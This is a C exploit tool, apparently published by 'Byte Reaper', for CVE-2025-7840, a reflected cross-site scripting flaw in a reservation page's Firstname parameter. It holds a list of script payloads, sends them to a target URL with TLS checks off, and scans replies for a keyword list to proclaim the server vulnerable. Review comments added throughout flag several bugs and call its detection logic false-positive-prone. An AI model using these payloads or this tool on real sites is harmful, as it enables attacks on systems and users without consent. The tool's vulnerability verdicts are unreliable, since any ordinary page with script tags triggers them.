/*
 * Author        : Byte Reaper
 * Telegram      : @ByteReaper0
 * CVE           : CVE-2025-7840
 * Vulnerability : Cross-Site Scripting (XSS)
 * Description   :
 *   This exploit targets a vulnerable web application endpoint that fails to sanitize
 *   user input on the `Firstname` parameter of a reservation form. By sending a crafted
 *   GET request to `/index.php?page=reserve&Firstname=<payload>&Lastname=test`, an attacker
 *   can inject and execute arbitrary JavaScript in the victim’s browser when the response
 *   is rendered. Features include:
 *     - Custom payload injection via `-b` option
 *     - Cookie-based session handling via `-c` option
 *     - Verbose logging for request/response analysis via `-v` option
 */



#include<stdio.h>
#include"argparse.h"
#include <curl/curl.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <stdlib.h>

#define FULL_URL 1024                     /* capacity of the assembled request URL; snprintf bounds the write */
int getPayload = 0;                       /* 1 when -b was given: send only selecetPayload instead of payloadXss[] */
int verbose = 0;                          /* -v flag: enables CURLOPT_VERBOSE and the extra diagnostics */
const char *url = NULL;                   /* -u: target base URL; main() refuses to continue without it */
const char *yourIP = NULL;                /* never read or written anywhere in this file */
const char *selecetPayload = NULL;        /* -b: user-supplied payload (name is a typo of "select", kept for callers) */
const char *nameFileCookie = NULL;        /* -c: cookie file, used as both CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR */
int selecetCookie = 0;                    /* 1 when -c was given */
int showOne = 0;                          /* set to 1 once in main() when verbose; gates per-payload URL printing */
int port = 0;                             /* never read or written anywhere in this file */

/*
 * Built-in payloads tried one after another by sendRequest() when -b is not
 * given. Each is URL-encoded with curl_easy_escape() before being placed in
 * the Firstname query parameter. Several entries deliberately stall for a few
 * seconds when run in a browser; that delay happens client-side and cannot be
 * observed from the HTTP timing this tool measures.
 */
const char *payloadXss[] =
{
    "<script\x0Ctype=\"text/javascript\">alert(1);</script>",
    "<script\x2Ftype=\"text/javascript\">alert(1);</script>",
    "<script>setTimeout(function(){alert('XSS')}, 3000);</script>",
    "<script>for(let i=0;i<1e9;i++){};alert('XSS')</script>",
    "<script>var t = Date.now(); while(Date.now() - t < 5000); alert(1);</script>",
    "<script>let i=0; function loop(){if(i++<100000) requestAnimationFrame(loop); else alert('done')} loop();</script>",
    "<script>let i=0; let x = setInterval(()=>{if(i++==30){clearInterval(x); alert(1);}},100);</script>"
};

/*
 * Substrings that sendRequest() looks for (case-sensitive strstr) in each
 * 2xx response body. A hit is reported as a likely finding, but the list
 * includes strings present in ordinary HTML ("<script>", "<a href=",
 * "setTimeout(", "innerHTML"), and the check never confirms that the
 * submitted payload itself came back unescaped. Treat a match as a prompt
 * for manual verification, not as proof.
 */
const char *key[] =
{
    "alert(",
    "<script>",
    "</script>",
    "javascript:alert",
    "<svg/onload=",
    "<img src=x onerror=",
    "<body onload=",
    "document.cookie",
    "<iframe",
    "<video",
    "<object",
    "onmouseover=",
    "onerror=",
    "eval(",
    "confirm(",
    "prompt(",
    "innerHTML",
    "setTimeout(",
    "<marquee",
    "srcdoc=",
    "contenteditable",
    "data:text/html",
    "<a href=",
    "<meta http-equiv="
};

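/*
 * Terminate the process after a fatal error. Every call site in this file is
 * an error path (allocation failure, URL-encoding failure, no CURL handle,
 * not root, no -u given).
 *
 * The previous body issued a raw x86-64 Linux `exit` syscall with status 0,
 * which (a) only built for that one platform, (b) reported success to the
 * shell even though it is only reached on failure, and (c) bypassed stdio, so
 * the diagnostic printed immediately before the call was lost whenever stdout
 * was a pipe or a file. exit() flushes open streams and reports failure; the
 * name is unchanged so existing callers compile as before.
 *
 * Does not return.
 */
void exitSyscall(void)
{
    exit(EXIT_FAILURE);
}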
/* Growable response body filled in by write_cb(); owned and freed by sendRequest(). */
struct Mem
{
    char *buffer;   /* heap buffer, NUL-terminated after every chunk; NULL until the first chunk arrives */
    size_t len;     /* bytes stored, not counting the terminating NUL */
};

/*
 * libcurl write callback: append one received chunk to the caller's
 * struct Mem and keep the buffer NUL-terminated so it can be searched
 * with str* functions afterwards.
 *
 * ptr, size, nmemb: the chunk as delivered by libcurl (size * nmemb bytes).
 * userdata:         struct Mem * to grow; buffer may initially be NULL.
 * Returns the number of bytes consumed (always the whole chunk). If the
 * buffer cannot be grown a message is printed and the process exits through
 * exitSyscall(), so libcurl never observes a short write.
 */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct Mem *out = userdata;
    size_t chunk = size * nmemb;
    size_t newLen = out->len + chunk;

    /* +1 reserves room for the NUL; realloc(NULL, n) behaves like malloc. */
    char *grown = realloc(out->buffer, newLen + 1);
    if (!grown)
    {
        printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
        exitSyscall();
    }

    memcpy(grown + out->len, ptr, chunk);
    grown[newLen] = '\0';
    out->buffer = grown;
    out->len = newLen;
    return chunk;
}
/*
 * Build the reservation URL with one payload in the `Firstname` parameter,
 * send it with libcurl and search any 2xx body for the strings in key[].
 *
 * targetHost: base URL from -u. "/index.php?page=reserve&..." is appended
 *             verbatim, so a trailing slash on the input yields "//index.php".
 *
 * Globals read: getPayload, selecetPayload, verbose, showOne, selecetCookie,
 * nameFileCookie, payloadXss[], key[]. No globals are written.
 *
 * REVIEW NOTES (code left unchanged; each point is repeated at its line):
 *  - With -b the code `goto`s into the body of the payload loop, skipping the
 *    initialisation of `numberPayloads` and `p`. After that single request the
 *    loop's `p++` and `p < numberPayloads` read indeterminate values, and a
 *    second iteration would index payloadXss[] with garbage (undefined behaviour).
 *  - `send_request:` is followed directly by a declaration; C11 does not allow a
 *    declaration as the statement after a label, so expect compilers in C11 mode
 *    to reject it.
 *  - The outcome test after curl_easy_perform() is `if (curl)`, which is always
 *    true at that point, so `r` is never examined and the error branch is dead.
 *  - A key[] match does not show the payload was reflected unescaped; several
 *    entries appear in ordinary pages, so false positives are expected.
 *  - The timing check uses clock() (CPU time of this process) and, in any case,
 *    the payload delays would occur in a browser, not in this HTTP exchange.
 */
void sendRequest(const char *targetHost)
{
    /* The NULL check for this handle only happens at send_request:, after curl
     * has already been passed to curl_easy_escape() below. */
    CURL *curl = curl_easy_init();
    char full[FULL_URL];
    struct Mem response = {NULL, 0};
    /* Redundant: both fields were zero-initialised on the previous line. */
    response.buffer = NULL;
    response.len = 0;
    if (verbose)
    {
        printf("\e[1;37m[+] Cleaning Response ===================================\e[0m\n");
        /* NOTE(review): response.buffer is still NULL here; "%s" with a null
         * pointer is undefined behaviour (glibc happens to print "(null)"). */
        printf("\e[1;33m[+] Response Buffer -> %s\e[0m\n", response.buffer);
        printf("\e[1;33m[+] Response Len -> %zu\e[0m\n", response.len);
        printf("\e[1;37m==========================================================\e[0m\n");
    }

    /* -b path: encode the user-supplied payload once and jump into the send step. */
    if (getPayload)
    {
        char *encode1 = curl_easy_escape(curl,
                                        selecetPayload,
                                        0);
        if (!encode1)
        {
            printf("\e[1;31m[-] URL encoding failed for payload + URL\e[0m\n");
            exitSyscall();
        }
        snprintf(full, sizeof(full),
                 "%s/index.php?page=reserve&Firstname=%s&Lastname=test",
                 targetHost, encode1);
        curl_free(encode1);
        if (verbose)
        {
            printf("\e[1;36m[+] Input Url : %s\e[0m\n", targetHost);
            printf("\e[1;36m[+] Full Url : %s\e[0m\n", full);
            printf("\e[1;36m[+] Encode Payload : %s\e[0m\n",selecetPayload);
        }
        /* Jumps into the for-body below, bypassing the initialisation of
         * numberPayloads and p; see the review notes in the header. */
        goto send_request;
    }

    /* Default path: try each built-in payload in turn, one request per entry. */
    int numberPayloads = sizeof(payloadXss) / sizeof(payloadXss[0]);
    for (int p = 0; p < numberPayloads; p++)
    {
        char *encode2 = curl_easy_escape(curl,
                                         payloadXss[p],
                                         0);
        if (!encode2)
        {
            printf("\e[1;31m[-] URL encoding failed for payload + URL\e[0m\n");
            exitSyscall();
        }
        snprintf(full, sizeof(full),
                 "%s/index.php?page=reserve&Firstname=%s&Lastname=test",
                 targetHost, encode2);
        curl_free(encode2);
        if (verbose)
        {
            /* showOne is set in main() whenever verbose is, so this prints for every payload. */
            if (showOne)
            {
                printf("\e[1;36m[+] Input Url : %s\e[0m\n", targetHost);
                printf("\e[1;36m[+] Full Url : %s\e[0m\n", full);
            }

        }

        /* Shared send step for both paths. The declaration on the next line
         * directly follows the label, which C11 does not permit. */
        send_request:
            CURLcode r ;
            if (curl == NULL)
            {
                printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n");
                exitSyscall();
            }
            curl_easy_setopt(curl,
                             CURLOPT_URL,
                             full);
            /* -c: the same file is read for the request and rewritten on cleanup. */
            if (selecetCookie)
            {
                curl_easy_setopt(curl,
                                 CURLOPT_COOKIEFILE,
                                 nameFileCookie);
                curl_easy_setopt(curl,
                                 CURLOPT_COOKIEJAR,
                                 nameFileCookie);

            }
            /* "" asks libcurl to advertise and decode every encoding it supports.
             * NOTE(review): an explicit Accept-Encoding header is also appended
             * below; confirm the body is still decoded, otherwise strstr() below
             * runs over compressed bytes. */
            curl_easy_setopt(curl,
                             CURLOPT_ACCEPT_ENCODING,
                             "");
            curl_easy_setopt(curl,
                             CURLOPT_FOLLOWLOCATION,
                             1L);
            /* First of two fixed 1.5 s pauses per payload. */
            usleep(1500000);
            curl_easy_setopt(curl,
                             CURLOPT_WRITEFUNCTION,
                             write_cb);
            curl_easy_setopt(curl,
                             CURLOPT_WRITEDATA,
                             &response);
            curl_easy_setopt(curl,
                             CURLOPT_CONNECTTIMEOUT,
                             5L);
            curl_easy_setopt(curl,
                             CURLOPT_TIMEOUT,
                             10L);
            /* TLS peer and hostname verification are switched off: the response
             * examined below could come from anyone on the network path. */
            curl_easy_setopt(curl,
                             CURLOPT_SSL_VERIFYPEER,
                             0L);
            curl_easy_setopt(curl,
                             CURLOPT_SSL_VERIFYHOST,
                             0L);
            if (verbose)
            {
                printf("=====================================================================\n");
                curl_easy_setopt(curl,
                                 CURLOPT_VERBOSE,
                                 1L);
                printf("=====================================================================\n");
            }

            /* Browser-like request headers; the list is rebuilt and freed per request. */
            struct curl_slist *h = NULL;
            h = curl_slist_append(h,
                                  "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            h = curl_slist_append(h,
                                  "Accept-Encoding: gzip, deflate, br");
            h = curl_slist_append(h,
                                  "Accept-Language: en-US,en;q=0.5");
            h = curl_slist_append(h,
                                  "Connection: keep-alive");
            h = curl_slist_append(h,
                                  "Referer: http://example.com");
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
            if (verbose)
            {
                printf("\n\e[1;35m[+] Encode Input ========================================\e[0m\n");
                printf("\e[1;34m[+] Full Url  : %s\e[0m\n", full);
                printf("\e[1;35m==========================================================\e[0m\n");
            }
            /* Second fixed 1.5 s pause. */
            usleep(1500000);
            /* NOTE(review): clock() returns this process's CPU time, not elapsed
             * time, so time spent waiting on the network is not counted and the
             * ">= 5.0" test further down is effectively unreachable. */
            clock_t start = clock();
            r = curl_easy_perform(curl);
            curl_slist_free_all(h);
            /* NOTE(review): always true after the NULL check above; the intended
             * test is presumably `r == CURLE_OK`. The else branch is unreachable. */
            if (curl)
            {
                long code = 0;
                printf("\e[1;36m[+] Request sent successfully\e[0m\n");
                curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
                                  &code);
                printf("\e[1;32m-> Http Code : %ld\e[0m\n",
                       code);
                if (code >= 200 && code < 300)
                {
                    printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\n",code);
                    printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n");
                    /* NOTE(review): response.buffer stays NULL when the 2xx reply
                     * carried no body (write_cb is never called); "%s" and the
                     * strstr() calls below then operate on a null pointer. */
                    printf("%s\n", response.buffer);
                    /* NOTE(review): "%d" with a size_t argument; "%zu" is the matching conversion. */
                    printf("\e[1;32m[Len] : %d\e[0m\n", response.len);
                    printf("\e[1;34m[+] Trying to find suspicious words in reply...\e[0m\n");
                    int numberKey = sizeof(key) / sizeof(key[0]);

                    clock_t end = clock();
                    double duration = (double)(end - start) / CLOCKS_PER_SEC;
                    /* One verdict per key: a key that does not match prints the
                     * "No suspicious words" line even if another key did match. */
                    for (int k = 0; k < numberKey; k++)
                    {
                        if (strstr(response.buffer, key[k]) != NULL)
                        {
                            printf("\e[1;34m[+] A suspicious word was found in the server's response !!\e[0m\n");
                            printf("\e[1;34m[+] Word Found : %s\e[0m\n", key[k]);
                            if (verbose)
                            {
                                printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n");
                                printf("%s\n", response.buffer);
                                /* NOTE(review): same size_t/"%d" mismatch as above. */
                                printf("\e[1;32m[Len] : %d\e[0m\n", response.len);
                                printf("\e[1;37m\n==================================================================================================\e[0m\n");
                            }
                            /* The match alone does not prove the payload was reflected
                             * unescaped; several key[] entries occur in ordinary HTML. */
                            printf("\e[1;34m[+] It is highly likely that the CVE-2025-7840 vulnerability exists on the server !!\e[0m\n");
                            printf("==========================================================\e[0m\n");
                            printf("\e[1;34m[+] Trying to check response timing....\e[0m\n");
                            printf("\e[1;34m[+] Injecting Payload ...\n");
                            printf("\e[1;34m[+] Time taken: %.2f seconds\e[0m\n", duration);
                            /* Any delay the payload would cause happens in a browser,
                             * not on the server; this HTTP round-trip cannot observe it. */
                            if (duration >= 5.0)
                            {
                                 printf("\e[1;34m[+] Possible XSS Executed (Delay Detected)\e[0m\n");
                                 printf("\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-7840)\e[0m\n");
                            }
                            printf("==========================================================\e[0m\n");

                        }
                        else
                        {
                            printf("\e[1;31m[-] No suspicious words were found in the server response !\e[0m\n");
                        }
                    }
                }
                else
                {
                    printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", code);
                }
            }
            /* Unreachable given `if (curl)` above. If it did run in verbose mode it
             * would replace this process with /bin/ping via a raw execve syscall and
             * never return, so the remaining payloads would not be sent. The clobber
             * list omits rcx and r11, which the kernel overwrites on syscall entry;
             * that is only harmless here because nothing executes afterwards. */
            else
            {
                printf("\e[1;31m[-] Error Send Request, Please Check Your Connection !\e[0m\n");
                printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(r));
                printf("\e[1;31m[-] Please Check Your Connection...\e[0m\n");
                if (verbose)
                {
                    printf("\e[1;33m[+] Example Command Check : ping google.com\e[0m\n");
                    printf("\e[1;33m[+] Run Command Ping in  sys_execve...\e[0m\n");
                    const char *command = "/bin/ping";
                    const char *argv[] =
                    {
                        "ping",
                        "-c",
                        "5",
                        "google.com",
                        NULL
                    };
                    const char *envp[] = { NULL };
                    __asm__ volatile
                    (
                        "mov $59, %%rax\n\t"
                        "mov %[command], %%rdi\n\t"
                        "mov %[argv], %%rsi\n\t"
                        "mov %[envp], %%rdx\n\t"
                        "syscall\n\t"
                        "mov $60, %%rax\n\t"
                        "xor %%rdi, %%rdi\n\t"
                        "syscall\n\t"
                        :
                        :[command] "r" (command),
                     [argv]  "r" (argv),
                     [envp]  "r" (envp)
                     :"rax", "rdi", "rsi", "rdx"
                    );
                    /* Never reached: both syscalls above end the process. */
                    exitSyscall();
                }
            }
            /* Reset per payload so the next response starts from an empty buffer
             * (free(NULL) is a no-op, so the guard is not strictly needed). */
            if (response.buffer)
            {
                free(response.buffer);
                response.buffer = NULL;
                response.len = 0;
            }
    }
    /* One handle is reused for every payload and released once here. */
    curl_easy_cleanup(curl);


}

/*
 * Entry point: print the banner, insist on running as root, parse
 * -u/-c/-b/-v with argparse, derive the global mode flags from which
 * options were supplied, and hand the target URL to sendRequest().
 *
 * NOTE(review): nothing visible in this file needs root - the work is
 * libcurl HTTP plus usleep() - so the getuid() gate only raises the
 * privilege at which any bug in this tool runs; confirm before keeping it.
 * NOTE(review): curl_global_init() is never called; curl_easy_init() does
 * it implicitly, which libcurl documents as acceptable only for a
 * single-threaded program such as this one.
 *
 * Returns 0 on the normal path; every failure path exits via exitSyscall().
 */
int main(int argc, const char **argv)
{
    printf(
        "\e[1;31m"
        "▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▄▖▖▖▄▖\n"
        "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌▙▌▙▌▛▌\n"
        "▙▖▚▘▙▖  ▙▖█▌▙▖▄▌   ▌▙▌ ▌█▌\n"
                          "\e[1;37m\t       Byte Reaper\n\e[0m"
    );
    printf("\e[1;31m---------------------------------------------------------------------------------------------\e[0m\n");

    /* Privilege gate (see note above). */
    if (getuid() != 0)
    {
        printf("\e[1;31m[-] You need to run this as root !\e[0m\n");
        printf("\e[1;31m[-] Example Command :  sudo ./exploit -u http://target\e[0m\n");
        printf("\e[1;31m[-] And Run Exploit , Exit...\e[0m\n");
        exitSyscall();
    }

    /* Option table; argparse writes straight into the file-scope globals. */
    struct argparse_option opts[] =
    {
        OPT_HELP(),
        OPT_STRING('u',
                   "url",
                   &url,
                   "Enter Target Url"),
        OPT_STRING('c',
                   "cookies",
                   &nameFileCookie,
                   "Enter File cookies "),
        OPT_STRING('b',
                   "payload",
                   &selecetPayload,
                   "Enter Your Payload For Inject in Target Server "),
        OPT_BOOLEAN('v',
                    "verbose",
                    &verbose,
                    "Verbose Mode "),
        OPT_END(),
    };
    struct argparse parser;
    argparse_init(&parser,
                  opts,
                  NULL,
                  0);
    argparse_parse(&parser,
                   argc,
                   argv);

    /* -u is the only mandatory option. */
    if (url == NULL)
    {
        printf("\e[1;31m[-] Please Enter target Url !\e[0m\n");
        printf("\e[1;31m[-] Exemple : ./exploit -u http://target\e[0m\n");
        exitSyscall();
    }

    /* Derive the mode flags; all of these globals start at 0, so a plain
     * assignment is equivalent to setting them only when the option is present. */
    getPayload = (selecetPayload != NULL);
    selecetCookie = (nameFileCookie != NULL);
    if (showOne == 0 && verbose)
    {
        /* Normalise whatever argparse stored to exactly 1 and enable the
         * per-payload URL printing in sendRequest(). */
        verbose = 1;
        showOne = 1;
    }

    sendRequest(url);
    return 0;
}